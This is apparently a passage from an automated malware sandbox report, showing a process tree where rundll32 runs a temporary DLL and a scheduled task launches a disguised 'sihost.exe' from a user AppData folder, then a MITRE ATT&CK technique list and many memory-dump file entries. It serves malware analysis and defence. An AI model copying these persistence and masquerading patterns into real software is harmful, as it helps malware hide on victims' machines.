- C:\Windows\SysWOW64\rundll32.exe
  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
  2⤵
  PID:3836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:1672

C:\Windows\system32\taskeng.exe
taskeng.exe {943F14EE-C392-4E1E-99C3-F15D47241F06} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
PID:2480
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
  2⤵
  PID:2136
- C:\Users\Admin\AppData\Roaming\evrtvvj
  C:\Users\Admin\AppData\Roaming\evrtvvj
  2⤵
  PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:3480

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/332-173-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/432-227-0x0000000003870000-0x0000000003871000-memory.dmp

Filesize
4KB

Download
memory/432-218-0x00000000037E0000-0x0000000003837000-memory.dmp

Filesize
348KB

Download
memory/432-197-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/432-213-0x0000000000C00000-0x0000000000C01000-memory.dmp

Filesize
4KB

Download
memory/432-198-0x00000000008C0000-0x00000000008FC000-memory.dmp

Filesize
240KB

Download
memory/432-217-0x00000000037E0000-0x0000000003837000-memory.dmp

Filesize
348KB

Download
memory/432-224-0x0000000003850000-0x0000000003851000-memory.dmp

Filesize
4KB

Download
memory/432-226-0x0000000003860000-0x0000000003861000-memory.dmp

Filesize
4KB

Download
memory/432-223-0x0000000003840000-0x0000000003841000-memory.dmp

Filesize
4KB

Download
memory/432-201-0x0000000073D21000-0x0000000073D23000-memory.dmp

Filesize
8KB

Download
memory/432-202-0x0000000000680000-0x0000000000681000-memory.dmp

Filesize
4KB

Download
memory/432-222-0x00000000037E0000-0x0000000003837000-memory.dmp

Filesize
348KB

Download
memory/432-203-0x0000000000690000-0x0000000000691000-memory.dmp

Filesize
4KB

Download
memory/432-204-0x00000000006A0000-0x00000000006A1000-memory.dmp

Filesize
4KB

Download
memory/432-205-0x0000000000900000-0x0000000000901000-memory.dmp

Filesize
4KB

Download
memory/432-221-0x00000000037E0000-0x0000000003837000-memory.dmp

Filesize
348KB

Download
memory/432-216-0x00000000037E0000-0x0000000003837000-memory.dmp

Filesize
348KB

Download
memory/432-214-0x00000000037E0000-0x0000000003837000-memory.dmp

Filesize
348KB

Download
memory/432-209-0x0000000000910000-0x0000000000911000-memory.dmp

Filesize
4KB

Download
memory/432-211-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

Filesize
4KB

Download
memory/432-212-0x0000000000BF0000-0x0000000000BF1000-memory.dmp

Filesize
4KB

Download
memory/472-288-0x00000000070F4000-0x00000000070F6000-memory.dmp

Filesize
8KB

Download
memory/472-229-0x0000000000400000-0x0000000002B6E000-memory.dmp

Filesize
39.4MB

Download
memory/472-219-0x0000000002B70000-0x0000000002BA0000-memory.dmp

Filesize
192KB

Download
memory/472-255-0x0000000004980000-0x000000000499E000-memory.dmp

Filesize
120KB

Download
memory/472-235-0x00000000070F1000-0x00000000070F2000-memory.dmp

Filesize
4KB

Download
memory/472-237-0x0000000002E60000-0x0000000002E7F000-memory.dmp

Filesize
124KB

Download
memory/472-241-0x00000000070F3000-0x00000000070F4000-memory.dmp

Filesize
4KB

Download
memory/472-240-0x00000000070F2000-0x00000000070F3000-memory.dmp

Filesize
4KB

Download
memory/860-239-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/860-234-0x00000000048F0000-0x00000000048F1000-memory.dmp

Filesize
4KB

Download
memory/860-236-0x0000000001EC0000-0x0000000001EC1000-memory.dmp

Filesize
4KB

Download
memory/860-238-0x00000000048F2000-0x00000000048F3000-memory.dmp

Filesize
4KB

Download
memory/872-220-0x0000000000400000-0x00000000021B7000-memory.dmp

Filesize
29.7MB

Download
memory/872-208-0x0000000002B10000-0x00000000048C7000-memory.dmp

Filesize
29.7MB

Download
memory/1036-60-0x0000000076A01000-0x0000000076A03000-memory.dmp

Filesize
8KB

Download
memory/1044-305-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/1212-231-0x0000000002B60000-0x0000000002B75000-memory.dmp

Filesize
84KB

Download
memory/1264-101-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1264-107-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1264-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1264-89-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1264-118-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1264-96-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1264-91-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1264-98-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1264-123-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1264-112-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1324-225-0x0000000000150000-0x000000000015B000-memory.dmp

Filesize
44KB

Download
memory/1324-215-0x000000001B130000-0x000000001B132000-memory.dmp

Filesize
8KB

Download
memory/1324-187-0x00000000010B0000-0x00000000010B1000-memory.dmp

Filesize
4KB

Download
memory/1596-206-0x00000000001D0000-0x00000000001D9000-memory.dmp

Filesize
36KB

Download
memory/1596-210-0x0000000000400000-0x0000000002145000-memory.dmp

Filesize
29.3MB

Download
memory/1624-228-0x000000001ABF0000-0x000000001ABF2000-memory.dmp

Filesize
8KB

Download
memory/1624-199-0x00000000001D0000-0x00000000001EC000-memory.dmp

Filesize
112KB

Download
memory/1624-196-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/1624-190-0x0000000000F20000-0x0000000000F21000-memory.dmp

Filesize
4KB

Download
memory/1624-200-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/1628-232-0x0000000000990000-0x0000000000991000-memory.dmp

Filesize
4KB

Download
memory/1976-207-0x0000000000400000-0x0000000002B6B000-memory.dmp

Filesize
39.4MB

Download
memory/1976-230-0x0000000000310000-0x0000000000358000-memory.dmp

Filesize
288KB

Download
memory/2200-334-0x00000000001F0000-0x00000000001F1000-memory.dmp

Filesize
4KB

Download
memory/2200-337-0x0000000000500000-0x0000000000501000-memory.dmp

Filesize
4KB

Download
memory/2200-335-0x00000000003F0000-0x00000000003F1000-memory.dmp

Filesize
4KB

Download
memory/2244-246-0x0000000000340000-0x0000000000341000-memory.dmp

Filesize
4KB

Download
memory/2244-254-0x000000001B000000-0x000000001B002000-memory.dmp

Filesize
8KB

Download
memory/2244-249-0x0000000000590000-0x0000000000591000-memory.dmp

Filesize
4KB

Download
memory/2244-248-0x0000000000350000-0x0000000000380000-memory.dmp

Filesize
192KB

Download
memory/2244-243-0x0000000001260000-0x0000000001261000-memory.dmp

Filesize
4KB

Download
memory/2300-322-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2440-258-0x000000013FFA0000-0x000000013FFA1000-memory.dmp

Filesize
4KB

Download
memory/2440-301-0x000000001B4E0000-0x000000001B4E2000-memory.dmp

Filesize
8KB

Download
memory/2508-314-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2520-264-0x000000001AE90000-0x000000001AE92000-memory.dmp

Filesize
8KB

Download
memory/2520-262-0x00000000012A0000-0x00000000012A1000-memory.dmp

Filesize
4KB

Download
memory/2596-266-0x00000000003B0000-0x00000000003B1000-memory.dmp

Filesize
4KB

Download
memory/2596-271-0x000000001B040000-0x000000001B042000-memory.dmp

Filesize
8KB

Download
memory/2656-269-0x0000000001170000-0x0000000001171000-memory.dmp

Filesize
4KB

Download
memory/2656-273-0x000000001B070000-0x000000001B072000-memory.dmp

Filesize
8KB

Download
memory/2720-280-0x000000001B0B0000-0x000000001B0B2000-memory.dmp

Filesize
8KB

Download
memory/2768-328-0x0000000000400000-0x0000000002B5D000-memory.dmp

Filesize
39.4MB

Download
memory/2768-317-0x0000000000240000-0x000000000026F000-memory.dmp

Filesize
188KB

Download
memory/2884-286-0x000000001AF20000-0x000000001AF22000-memory.dmp

Filesize
8KB

Download
memory/2956-289-0x0000000002030000-0x0000000002032000-memory.dmp

Filesize
8KB

Download
memory/3028-327-0x000000001B065000-0x000000001B066000-memory.dmp

Filesize
4KB

Download
memory/3028-320-0x000000001B040000-0x000000001B042000-memory.dmp

Filesize
8KB

Download
memory/3028-324-0x000000001B066000-0x000000001B067000-memory.dmp

Filesize
4KB

Download
memory/3028-325-0x000000001B046000-0x000000001B065000-memory.dmp

Filesize
124KB

Download